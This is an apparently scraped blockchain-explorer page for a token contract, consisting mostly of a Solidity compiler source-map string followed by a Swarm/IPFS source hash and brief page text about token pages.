-1:-1:-1;;;10949:194:0;;-1:-1:-1;;;;;10949:13:0;;::::1;::::0;:64:::1;::::0;:194:::1;::::0;11028:11;;10949:13:::1;::::0;11070:4;;11097::::1;::::0;11117:15:::1;::::0;10949:194:::1;;;:::i;:::-;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;;;;;10669:482;5944:1;-1:-1:-1::0;5956:6:0;:14;;-1:-1:-1;;;;5956:14:0;;;10606:545::o;1386:179::-;1444:7;;1476:5;1480:1;1476;:5;:::i;:::-;1464:17;;1505:1;1500;:6;;1492:46;;;;-1:-1:-1;;;1492:46:0;;12966:2:1;1492:46:0;;;12948:21:1;13005:2;12985:18;;;12978:30;13044:29;13024:18;;;13017:57;13091:18;;1492:46:0;12764:351:1;11269:215:0;11374:16;;11344:7;;-1:-1:-1;;;;;11374:16:0;;;11366:24;;;;11363:114;;-1:-1:-1;11413:1:0;11406:8;;11363:114;11452:13;:1;11463;11452:10;:13::i;:::-;11445:20;;;;1573:151;1636:7;1663:53;1672:1;1675;1663:53;;;;;;;;;;;;;;;;;:8;:53::i;2329:189::-;2415:7;2450:12;2443:5;2435:28;;;;-1:-1:-1;;;2435:28:0;;;;;;;;:::i;:::-;-1:-1:-1;2474:9:0;2486:5;2490:1;2486;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;622:70;567:131;:::o;703:315::-;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:1;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:1;1828:18;;;;1815:32;;1397:456::o;2047:247::-;2106:6;2159:2;2147:9;2138:7;2134:23;2130:32;2127:52;;;2175:1;2172;2165:12;2127:52;2214:9;2201:23;2233:31;2258:5;2233:31;:::i;2507:388::-;2575:6;2583;2636:2;2624:9;2615:7;2611:23;2607:32;2604:52;;;2652:1;2649;2642:12;2604:52;2691:9;2678:23;2710:31;2735:5;2710:31;:::i;:::-;2760:5;-1:-1:-1;2817:2:1;2802:18;;2789:32;2830:33;2789:32;2830:33;:::i;:::-;2882:7;2872:17;;;2507:388;;;;;:::o;2900:127::-;2961:10;2956:3;2952:20;2949:1;2942:31;2992:4;2989:1;2982:15;3016:4;3013:1;3006:15;3032:422;3121:1;3164:5;3121:1;3178:270;3199:7;3189:8;3186:21;3178:270;;;3258:4;3254:1;3250:6;3246:17;3240:4;3237:27;3234:53;;;3267:18;;:::i;:::-;3317:7;3307:8;3303:22;3300:55;;;3337:16;;;;3300:55;3416:22;;;;3376:15;;;;3178:270;;;3182:3;3032:422;;;;;:::o;3459:806::-;3508:5;3538:8;3528:80;;-1:-1:-1;3579:1:1;3593:5;;3528:80;3627:4;3617:76;;-1:-1:-1;3664:1:1;3678:5;;3617:76;3709:4;3727:1;3722:59;;;;3795:1;3790:130;;;;3702:218;;3722:59;3752:1;3743:10;;3766:5;;;3790:130;3827:3;3817:8;3814:17;3811:43;;;3834:18;;:::i;:::-;-1:-1:-1;;3890:1:1;3876:16;;3905:5;;3702:218;;4004:2;3994:8;3991:16;3985:3;3979:4;3976:13;3972:36;3966:2;3956:8;3953:16;3948:2;3942:4;3939:12;3935:35;3932:77;3929:159;;;-1:-1:-1;4041:19:1;;;4073:5;;3929:159;4120:34;4145:8;4139:4;4120:34;:::i;:::-;4190:6;4186:1;4182:6;4178:19;4169:7;4166:32;4163:58;;;4201:18;;:::i;:::-;4239:20;;3459:806;-1:-1:-1;;;3459:806:1:o;4270:140::-;4328:5;4357:47;4398:4;4388:8;4384:19;4378:4;4357:47;:::i;4415:168::-;4488:9;;;4519;;4536:15;;;4530:22;;4516:37;4506:71;;4557:18;;:::i;4588:356::-;4790:2;4772:21;;;4809:18;;;4802:30;4868:34;4863:2;4848:18;;4841:62;4935:2;4920:18;;4588:356::o;5301:251::-;5371:6;5424:2;5412:9;5403:7;5399:23;5395:32;5392:52;;;5440:1;5437;5430:12;5392:52;5472:9;5466:16;5491:31;5516:5;5491:31;:::i;6478:306::-;6566:6;6574;6582;6635:2;6623:9;6614:7;6610:23;6606:32;6603:52;;;6651:1;6648;6641:12;6603:52;6680:9;6674:16;6664:26;;6730:2;6719:9;6715:18;6709:25;6699:35;;6774:2;6763:9;6759:18;6753:25;6743:35;;6478:306;;;;;:::o;7068:277::-;7135:6;7188:2;7176:9;7167:7;7163:23;7159:32;7156:52;;;7204:1;7201;7194:12;7156:52;7236:9;7230:16;7289:5;7282:13;7275:21;7268:5;7265:32;7255:60;;7311:1;7308;7301:12;10131:125;10196:9;;;10217:10;;;10214:36;;;10230:18;;:::i;10618:135::-;10657:3;10678:17;;;10675:43;;10698:18;;:::i;:::-;-1:-1:-1;10745:1:1;10734:13;;10618:135::o;10758:128::-;10825:9;;;10846:11;;;10843:37;;;10860:18;;:::i;10891:217::-;10931:1;10957;10947:132;;11001:10;10996:3;10992:20;10989:1;10982:31;11036:4;11033:1;11026:15;11064:4;11061:1;11054:15;10947:132;-1:-1:-1;11093:9:1;;10891:217::o;11647:127::-;11708:10;11703:3;11699:20;11696:1;11689:31;11739:4;11736:1;11729:15;11763:4;11760:1;11753:15;11779:980;12041:4;12089:3;12078:9;12074:19;12120:6;12109:9;12102:25;12146:2;12184:6;12179:2;12168:9;12164:18;12157:34;12227:3;12222:2;12211:9;12207:18;12200:31;12251:6;12286;12280:13;12317:6;12309;12302:22;12355:3;12344:9;12340:19;12333:26;;12394:2;12386:6;12382:15;12368:29;;12415:1;12425:195;12439:6;12436:1;12433:13;12425:195;;;12504:13;;-1:-1:-1;;;;;12500:39:1;12488:52;;12595:15;;;;12560:12;;;;12536:1;12454:9;12425:195;;;-1:-1:-1;;;;;;;12676:32:1;;;;12671:2;12656:18;;12649:60;-1:-1:-1;;;12740:3:1;12725:19;12718:35;12637:3;11779:980;-1:-1:-1;;;11779:980:1:o

Swarm Source

ipfs://5e55120ad31da91b8e842070298a14f032227f0f7653aa35dae13d4fcc6415b3
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.